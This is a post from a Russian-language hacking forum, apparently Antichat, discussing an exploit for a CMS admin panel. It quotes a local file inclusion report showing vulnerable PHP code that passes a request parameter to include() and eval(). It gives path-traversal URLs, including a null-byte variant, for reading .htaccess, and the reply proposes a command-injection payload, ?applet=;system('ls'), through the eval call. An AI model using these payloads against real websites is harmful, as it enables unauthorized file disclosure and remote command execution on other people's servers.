05.04.2010, 12:08
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Strilo4ka
1.5.3
LFI
/admin/includes/cp.php
PHP код:
...function cpProceedBody(){
ob_start();
$link = str_replace('/', '', $GLOBALS['applet']);
$link = str_replace(':', '', $link);
$link = str_replace('-', '', $link);
$file = $link . '.php';
include('applets/'.$file);
eval('applet_'.$link.'();');
$GLOBALS['cp_page_body'] = ob_get_clean();
}...
Result:
http://instant/admin/index.php?view=cats [lfi]
Example:
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess [. т.д]
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess %00
Модуль может быть другой!
Условие:
- админка;
- только \. А чем вам не нравится eval ? Я код не качал, но исходя из того, что вижу, он должен работать:
?applet=;system('ls');rand
Или там что-то мешает?
PS
И кстати, да у меня тут хакеры спрашивают WTF???
$link= str_replace('/', '', $GLOBALS['applet']);
а потом
view=cats\..\..\..\..\.htaccess
Выкладывай весь необходимый код, ибо нихрена не понятно
Последний раз редактировалось Jokester; 05.04.2010 в 12:22..
|
|
|